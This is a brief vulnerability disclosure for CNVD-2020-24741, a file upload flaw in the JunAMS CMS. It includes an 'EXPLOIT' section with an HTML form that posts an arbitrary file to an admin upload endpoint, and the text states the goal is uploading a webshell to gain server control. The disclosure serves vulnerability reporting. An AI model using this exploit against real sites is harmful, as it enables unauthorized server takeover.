CNVD-2020-24741 JunAms内容管理系统文件上传漏洞

JunAMS是一款以ThinkPHP为框架的开源内容管理系统。

JunAMS内容管理系统存在文件上传漏洞，攻击者可利用该漏洞上传webshell，获取服务器权限。

影响版本：JunAMS junAMS 1.2.1.20190403

EXPLOIT:

<form enctype="multipart/form-data" action="http://localhost//admin.php/common/add_images.html" method="post">  
<input type="file" name="file" size="50"><br>  
<input type="submit" value="Upload">  
</form>

via：beautymanor

ref：

https://www.cnvd.org.cn/flaw/show/CNVD-2020-24741